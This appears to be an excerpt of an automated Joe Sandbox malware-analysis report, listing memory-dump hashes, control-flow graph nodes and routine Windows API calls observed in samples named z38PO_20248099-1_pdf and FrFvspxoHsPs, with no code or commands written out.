                                • Instruction ID: e3fc3b9b062232ae4bf315dd7b6b28f31026ba90a2eb83dfad000646c6ee7939
                                • Opcode Fuzzy Hash: 8c68aaca6ddb5c8811f6c7605c6ffb107a08cdfc6fa0b65278e0d023ca124aa6
                                • Instruction Fuzzy Hash: 02515174B509049FDB94DB68D960BAE7BF2FBC8310F50856AC409E7388EF709C018BA1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5b5f939ac87df6c3111f98181d49dc683ff352b3f57968990175660c4f59be54
                                • Instruction ID: 2b609ca6be7f616b60cdc80abd810e3f7884ebcd696ea100140c7187e7cd34e5
                                • Opcode Fuzzy Hash: 5b5f939ac87df6c3111f98181d49dc683ff352b3f57968990175660c4f59be54
                                • Instruction Fuzzy Hash: 9151D778B202144BEFE19668D85476F276BEB89320F10842FE40AD7794DB7CCC4593A1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6cdd0dfa37e39cfcff10e9b39cbb05a9df3d1376c61bff2979f6204aa78926d4
                                • Instruction ID: 951923196a24ecd4e9733f215f59369ff7083543bc89661ef6591d73bff44d6d
                                • Opcode Fuzzy Hash: 6cdd0dfa37e39cfcff10e9b39cbb05a9df3d1376c61bff2979f6204aa78926d4
                                • Instruction Fuzzy Hash: F051C778B202144BEFE59668D85472F266BFB89360F20842FE40BC7794DB7CCC4593A1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d01b51e98ddca480f4201a004603ca02896dc09409755e916709cd3f59d7ef2
                                • Instruction ID: ce5860ffa6a7cf9186d442f75e8e1a0c85ab58c5bb303d1e13456fdddd764708
                                • Opcode Fuzzy Hash: 1d01b51e98ddca480f4201a004603ca02896dc09409755e916709cd3f59d7ef2
                                • Instruction Fuzzy Hash: B9516074F002189FEB559FA9C8147AEBBF7FF88710F20856AD506AB395DA718C019F90
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fbff1956ec9f2b4ca03140d3b00722d0282abd49b84d309451c6ae698402f581
                                • Instruction ID: 79e9827b9190e898a477259c13954251a57efd8e61355718e3c0747185d6e099
                                • Opcode Fuzzy Hash: fbff1956ec9f2b4ca03140d3b00722d0282abd49b84d309451c6ae698402f581
                                • Instruction Fuzzy Hash: 6541A275E006099FDFB5CEA9C880AAFF7B2FB54220F10492AE156D7340C330F8658B91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d61aa59d69139129677b650fcd04b592751f0ab30c32c061c3d63d7e960c602
                                • Instruction ID: 1dfd695422b111163da934887d77b6c1c37c9a93c3ebc211e26b80d491006a95
                                • Opcode Fuzzy Hash: 8d61aa59d69139129677b650fcd04b592751f0ab30c32c061c3d63d7e960c602
                                • Instruction Fuzzy Hash: 8941A334E006099FDBA5DFA5C4446AFBBB2BF85350F10492ED406EB340EB70D846CB91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3902842745.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6bb0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3b2b18ea344458658893697be038722a15e1a31240c009e6573dfaba5fa7eca4
                                • Instruction ID: 4ed9139ac9d62310ab6e4a6216701cfa0536b71e8f6a5ebc4672bc5b7739f3eb
                                • Opcode Fuzzy Hash: 3b2b18ea344458658893697be038722a15e1a31240c009e6573dfaba5fa7eca4
                                • Instruction Fuzzy Hash: 22415E71E107099FCB14DFA9C8546EDFBB1EF88310F14D659E505BB260EBB0A981CB90
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 78cf612ddd92067a3b0f3e33eb9e6bda67a461f1d4e048f671f08181745a3640
                                • Instruction ID: 2cab9b04e0e14d7bde871e53a7e46080b3808c04b60733aca52343991c17bd96
                                • Opcode Fuzzy Hash: 78cf612ddd92067a3b0f3e33eb9e6bda67a461f1d4e048f671f08181745a3640
                                • Instruction Fuzzy Hash: 7D31ED34B102059FEB95AB74D4246AF7BA2BF89760F20486DC402DB391EFB5CD01CBA4
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fce7edda5d772d724cd57eb3b26d98a489b73368282ca735a2bacd5e87c056df
                                • Instruction ID: c031d66492ca9d34a1fa0ed5cf14cf71ecce42faeaca99b4ef482ab03749f915
                                • Opcode Fuzzy Hash: fce7edda5d772d724cd57eb3b26d98a489b73368282ca735a2bacd5e87c056df
                                • Instruction Fuzzy Hash: 0331A334E1070A9BDB65DF65D88069FB7B6FF85310F20862AE401AB304EB71E846CB91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5fe8aad3985521ddd7720fbdaed2617594d5f3d12cc8dc32e1a4ed4ad45795ee
                                • Instruction ID: 72eb73e5f76c344a5736a4e351d7a11f474580c5947709fa9cb0b2cf43238d56
                                • Opcode Fuzzy Hash: 5fe8aad3985521ddd7720fbdaed2617594d5f3d12cc8dc32e1a4ed4ad45795ee
                                • Instruction Fuzzy Hash: 7231B234E002159BCB59DF68D85469FBBF2FF89310F10851AE906EB350DBB1AD42CB50
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5460e20dd04702a065f8734c34c1f40eaf51fecb9d07a19547a91bf54efe3bd
                                • Instruction ID: 029fd804610988e21f57da642ed50ef56d877e4ff856c7b02ece8037f1d5be63
                                • Opcode Fuzzy Hash: d5460e20dd04702a065f8734c34c1f40eaf51fecb9d07a19547a91bf54efe3bd
                                • Instruction Fuzzy Hash: B8316E34E006199BCB55DF68D85469FBBF2FF89310F10852AE906E7354DBB1AD42CB50
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 38a3141cae55f888d6e9661172ce61382cf0561f9e173829a6de042e23c42fcb
                                • Instruction ID: 7a99def64d81dd227d64eb018492969a866586505da387981d0451125f162903
                                • Opcode Fuzzy Hash: 38a3141cae55f888d6e9661172ce61382cf0561f9e173829a6de042e23c42fcb
                                • Instruction Fuzzy Hash: CC217F75E006149FDB51DF79D980AAEBFF5BB48720F14806AE945E7384E731E841CB90
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3902842745.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6bb0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f9a39dc1f9b3fd4b5ff8276e12d69e5339e083febdd2ed6f34b01c08ace01686
                                • Instruction ID: 23058143efd64256dea20a36cfebc6db2096f4b4e935c0869e7c6d2b80413da0
                                • Opcode Fuzzy Hash: f9a39dc1f9b3fd4b5ff8276e12d69e5339e083febdd2ed6f34b01c08ace01686
                                • Instruction Fuzzy Hash: 3C218D78B002008FDB54EB78D854BAF7BB6EBC8700F2084A9D406D7755DB719C02CB91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d509e451289c0d3ee8d3185dbfb6fcdc75d9b1e10bc4e8b24b9afbffa391101a
                                • Instruction ID: 9dd9d8d0af21a20a93f3336dba9322e3b4179e7510c31b7454971a31b7d6cabf
                                • Opcode Fuzzy Hash: d509e451289c0d3ee8d3185dbfb6fcdc75d9b1e10bc4e8b24b9afbffa391101a
                                • Instruction Fuzzy Hash: BD217F75E006149FDB90DF69D940AAEBBF5BB48720F10806AE905E7384E731D841CB90
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3902842745.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6bb0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5f40dff2fbf776b350ac0583751ffb46d555fc7a57e9da8de872b9a9d449f264
                                • Instruction ID: fc032d64116b29258d9644d1aaa36826798b4ab9001819043a519b6b17b3a148
                                • Opcode Fuzzy Hash: 5f40dff2fbf776b350ac0583751ffb46d555fc7a57e9da8de872b9a9d449f264
                                • Instruction Fuzzy Hash: A8219A78B002049FDB54EB68D854B6F7BBAEBC8700F2084A8E406D3754EB71ED01CBA1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3858309650.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_258d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a96c12f7c70af05858de68a8cb24fbba55740e819a5fb24385365948cede2b22
                                • Instruction ID: 8a068b9f5ff95bd168cf5ed1aeb7071afbc56429aa350b4c5f3001448df29f48
                                • Opcode Fuzzy Hash: a96c12f7c70af05858de68a8cb24fbba55740e819a5fb24385365948cede2b22
                                • Instruction Fuzzy Hash: 6621F971505344DFDB14EF20D5C4B2ABBB5FB84314F24C569D80A5B286C3B6D446CAA7
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3858309650.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_258d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ff425ee948fcace7ff3a9c330e2031ece10bf5ba51cfde20d3db0279584da825
                                • Instruction ID: 0011608331ce2287ddc6259cd84e4bbcc27a2b93f2ca613ec5abaa4164735ad3
                                • Opcode Fuzzy Hash: ff425ee948fcace7ff3a9c330e2031ece10bf5ba51cfde20d3db0279584da825
                                • Instruction Fuzzy Hash: CF2125B1500344DFDB08EF20D5C0B25BBB5FB84314F24C96DD90A5B2A2C7F6E846CA62
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3858309650.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_258d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 02a1c24997e3d9a9b97a4eb6f9175bb4a9c8c9485755afb01f243fd6e1f98c7f
                                • Instruction ID: 10934deec6d2a9c54736f5acc9828d11f1beb2f3d2b3a98759c440895e5e59bf
                                • Opcode Fuzzy Hash: 02a1c24997e3d9a9b97a4eb6f9175bb4a9c8c9485755afb01f243fd6e1f98c7f
                                • Instruction Fuzzy Hash: B321D075504244DFEB14EF20D9C0B36BBB5FB84314F24CA69D80A5A2D2D3B6D846CA66
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3858309650.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_258d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 966e8ce425370b3ed0f99a7a3e1fdc18488b87b3614dfca12517706336e99460
                                • Instruction ID: 57e66bfbd241540d150986fd2de1524e8e1c49f81732678d029c636f4fb23a57
                                • Opcode Fuzzy Hash: 966e8ce425370b3ed0f99a7a3e1fdc18488b87b3614dfca12517706336e99460
                                • Instruction Fuzzy Hash: 7A215C751093C49FCB03DB24D990711BFB1AB46214F29C5DBD8898F2A7C37A984ACB62
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3902842745.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6bb0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c61ad9d48fbf3c21824331e41972e29bff9dfd39ce475a2bb7f38326c4596c9
                                • Instruction ID: 6bb6513e1e3216b135b49ff5b457ea02a7d9c433e6a1935a4d31a33aee18fa8a

                                Execution Graph

                                Execution Coverage:8%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:154
                                Total number of Limit Nodes:4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1107 55cbde3-55cbdea 1108 55cbdec 1107->1108 1109 55cbdf1-55cbf04 1107->1109 1110 55cbdee-55cbdef 1108->1110 1111 55cbdb5-55cbddb 1108->1111 1119 55cbf66-55cbfd9 call 55ca92c 1109->1119 1120 55cbf06-55cbf5e 1109->1120 1110->1109 1123 55cbfde-55cc04b call 55c9ac8 call 55ca93c 1119->1123 1120->1119
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-227171996
                                • Opcode ID: 50518760c21e2d4c27214c0ce78fc27d75e55a307e31db0bb48f683a5e71751d
                                • Instruction ID: 7f22f3bc773184a93410c7bea5759a64a15c32f0f6f167b384bdc0eeeaf749d5
                                • Opcode Fuzzy Hash: 50518760c21e2d4c27214c0ce78fc27d75e55a307e31db0bb48f683a5e71751d
                                • Instruction Fuzzy Hash: 12710535D40B01CFDB00EF6AD495645B7B5FF85318F818AA9D849AB316EB71E898CF80

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1133 55ca8fc-55cbf04 1144 55cbf66-55cc04b call 55ca92c call 55c9ac8 call 55ca93c 1133->1144 1145 55cbf06-55cbf5e 1133->1145 1145->1144
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-227171996
                                • Opcode ID: 2145a94f3da83a846ddef9131842509604940728bc71772b07911594a5c36500
                                • Instruction ID: 20be0cac431eb6dcf86cf66ab91340882d3bdda6ef73cfd25b8e003d3cf2b3e9
                                • Opcode Fuzzy Hash: 2145a94f3da83a846ddef9131842509604940728bc71772b07911594a5c36500
                                • Instruction Fuzzy Hash: B761D431950B06CFDB00EF2AD495945B7F5FF85314B818AA9D849AB316EB71F898CF80

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1158 145b0f8-145b117 1159 145b143-145b147 1158->1159 1160 145b119-145b126 call 145a48c 1158->1160 1161 145b149-145b153 1159->1161 1162 145b15b-145b19c 1159->1162 1167 145b13c 1160->1167 1168 145b128 1160->1168 1161->1162 1169 145b19e-145b1a6 1162->1169 1170 145b1a9-145b1b7 1162->1170 1167->1159 1216 145b12e call 145b7a0 1168->1216 1217 145b12e call 145b78f 1168->1217 1169->1170 1171 145b1b9-145b1be 1170->1171 1172 145b1db-145b1dd 1170->1172 1175 145b1c0-145b1c7 call 145a498 1171->1175 1176 145b1c9 1171->1176 1174 145b1e0-145b1e7 1172->1174 1173 145b134-145b136 1173->1167 1177 145b278-145b338 1173->1177 1178 145b1f4-145b1fb 1174->1178 1179 145b1e9-145b1f1 1174->1179 1181 145b1cb-145b1d9 1175->1181 1176->1181 1209 145b340-145b36b GetModuleHandleW 1177->1209 1210 145b33a-145b33d 1177->1210 1182 145b1fd-145b205 1178->1182 1183 145b208-145b211 call 145a4a8 1178->1183 1179->1178 1181->1174 1182->1183 1189 145b213-145b21b 1183->1189 1190 145b21e-145b223 1183->1190 1189->1190 1191 145b225-145b22c 1190->1191 1192 145b241-145b245 1190->1192 1191->1192 1194 145b22e-145b23e call 145a4b8 call 145a4c8 1191->1194 1214 145b248 call 145ba71 1192->1214 1215 145b248 call 145baa0 1192->1215 1194->1192 1195 145b24b-145b24e 1198 145b271-145b277 1195->1198 1199 145b250-145b26e 1195->1199 1199->1198 1211 145b374-145b388 1209->1211 1212 145b36d-145b373 1209->1212 1210->1209 1212->1211 1214->1195 1215->1195 1216->1173 1217->1173
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0145B35E
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1493664600.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_1450000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 5c62364a71b80cda448dd448ffa47d5790638005b269c69a9719f2cb658ff092
                                • Instruction ID: aa6a1dd38b9e6127af93f1805bb50785152f7131fb40f4458d397367b3cd4b50
                                • Opcode Fuzzy Hash: 5c62364a71b80cda448dd448ffa47d5790638005b269c69a9719f2cb658ff092
                                • Instruction Fuzzy Hash: DA812370A00B058FE7A4DF6AD44575BBBF6FF48240F108A2ED84A97B61D774E845CBA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1218 145590c-14559d9 CreateActCtxA 1220 14559e2-1455a3c 1218->1220 1221 14559db-14559e1 1218->1221 1228 1455a3e-1455a41 1220->1228 1229 1455a4b-1455a4f 1220->1229 1221->1220 1228->1229 1230 1455a51-1455a5d 1229->1230 1231 1455a60 1229->1231 1230->1231 1232 1455a61 1231->1232 1232->1232
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 014559C9
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1493664600.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_1450000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 813ee8d5830775d689a0d3648b813ba08e6beda7a268d10715e56a8bebd85f44
                                • Instruction ID: 9a58fa97c492ae8f06d3f39b9d1019dfad9314b61766de6c22a5b088430ba1fd
                                • Opcode Fuzzy Hash: 813ee8d5830775d689a0d3648b813ba08e6beda7a268d10715e56a8bebd85f44
                                • Instruction Fuzzy Hash: 2441BDB1C00719CBEB24CFA9C984B9EBBB5BF49304F20856AD408AB255DB756946CF50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1234 1454514-14559d9 CreateActCtxA 1237 14559e2-1455a3c 1234->1237 1238 14559db-14559e1 1234->1238 1245 1455a3e-1455a41 1237->1245 1246 1455a4b-1455a4f 1237->1246 1238->1237 1245->1246 1247 1455a51-1455a5d 1246->1247 1248 1455a60 1246->1248 1247->1248 1249 1455a61 1248->1249 1249->1249
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 014559C9
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1493664600.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_1450000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 9e5930b7e2a75758fbb680eeaa042befaf88650f0fdf8e897872d560ab686f08
                                • Instruction ID: a2c11f7d8a1336067b7bddab4ff9e4ad68b25d1c1d2fb96733d46f5ca68e7f5e
                                • Opcode Fuzzy Hash: 9e5930b7e2a75758fbb680eeaa042befaf88650f0fdf8e897872d560ab686f08
                                • Instruction Fuzzy Hash: 1941B2B0C0071DCBEB24DFA9C884B9EFBB5BF49704F20856AD808AB255DB756945CF90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1251 55943a0-55943dc 1252 559448c-55944ac 1251->1252 1253 55943e2-55943e7 1251->1253 1260 55944af-55944bc 1252->1260 1254 55943e9-5594420 1253->1254 1255 559443a-5594472 CallWindowProcW 1253->1255 1261 5594429-5594438 1254->1261 1262 5594422-5594428 1254->1262 1256 559447b-559448a 1255->1256 1257 5594474-559447a 1255->1257 1256->1260 1257->1256 1261->1260 1262->1261
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05594461
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502318215.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_5590000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: db1365e2ecb1d8b81f15d8b695a986712bd9dbbe67772335a15e6eb4a5b23dfd
                                • Instruction ID: e77ca6b3ab06b1f356361d10a79146c86b7ddd03e1f25bbe810b242b0517ed7e
                                • Opcode Fuzzy Hash: db1365e2ecb1d8b81f15d8b695a986712bd9dbbe67772335a15e6eb4a5b23dfd
                                • Instruction Fuzzy Hash: E54107B5900309CFDB14CF99C488AAABBF5FF88314F24C459D519AB321E774A845CFA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1265 145b750-145d794 DuplicateHandle 1267 145d796-145d79c 1265->1267 1268 145d79d-145d7ba 1265->1268 1267->1268
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0145D6C6,?,?,?,?,?), ref: 0145D787
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1493664600.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_1450000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 62a82ffbb956ddf0f9b43da65473a99736d15e9b9d5c1bc296bcd64564ae35fe
                                • Instruction ID: a320a743531792cf4530c050597c7fd46a8ce66dbafc9756f6345f11a94050b1
                                • Opcode Fuzzy Hash: 62a82ffbb956ddf0f9b43da65473a99736d15e9b9d5c1bc296bcd64564ae35fe
                                • Instruction Fuzzy Hash: 4221D2B5D00249DFDB10CF9AD884AEEBBF4EB48310F14846AE918A3351D374A950CFA5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1271 145d6f9-145d6fb 1272 145d700-145d794 DuplicateHandle 1271->1272 1273 145d796-145d79c 1272->1273 1274 145d79d-145d7ba 1272->1274 1273->1274
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0145D6C6,?,?,?,?,?), ref: 0145D787
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1493664600.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_1450000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 900df66e9162355048e38ddbb0ff02154972891b9d10c9e722302a43ec26820e
                                • Instruction ID: 83d735f47315a5bcd85dd6cd0090c0e373aa10e1e8e7e6671ed9a612feb98923
                                • Opcode Fuzzy Hash: 900df66e9162355048e38ddbb0ff02154972891b9d10c9e722302a43ec26820e
                                • Instruction Fuzzy Hash: 4221B5B5D00249DFDB10CF9AD985ADEBBF9EB48310F14841AE918A3350D378A954CFA5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1277 145b2f8-145b338 1278 145b340-145b36b GetModuleHandleW 1277->1278 1279 145b33a-145b33d 1277->1279 1280 145b374-145b388 1278->1280 1281 145b36d-145b373 1278->1281 1279->1278 1281->1280
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0145B35E
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1493664600.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_1450000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: b42db2e643e21be6a25b03a139ac0dc36e7ad0404dc1e7043f3d43eab6708c9d
                                • Instruction ID: 08c3a4e9387a7dafb4f3d588d65bbbca85ab7bb9508f9940522ba8316bcd9a14
                                • Opcode Fuzzy Hash: b42db2e643e21be6a25b03a139ac0dc36e7ad0404dc1e7043f3d43eab6708c9d
                                • Instruction Fuzzy Hash: 75110FB6C002498FDB10CF9AC444B9EFBF5EB88210F10846AD819B7211C379A545CFA1

                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 68b81d1bbf31ea676aa6f780bd3c9bcc05e1369fb1f23db87d1b660b61e85687
                                • Instruction ID: 364fc197477f6bb67ca5c93b2f30e7c88aaa095bfc2e259ccbd51c4b3b8d818c
                                • Opcode Fuzzy Hash: 68b81d1bbf31ea676aa6f780bd3c9bcc05e1369fb1f23db87d1b660b61e85687
                                • Instruction Fuzzy Hash: 17411034A1070ACFCB04EFB8C49499DBBB6FF89304F00859DE516AB365EB71A946CB41
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 05708cf2e2e6d4715677e901abeeb50f130e2090fb461261ac190db08d801199
                                • Instruction ID: 295b18bb8faa71b8d2a3fb94fde9f4f71659cdda6e9d2490f46099f500c5ec4c
                                • Opcode Fuzzy Hash: 05708cf2e2e6d4715677e901abeeb50f130e2090fb461261ac190db08d801199
                                • Instruction Fuzzy Hash: 4F412F75A0024A9FCB00DFA9D4849A9FBB5FF89310B14C699E819EB311E730E985CF90
                                Memory Dump Source
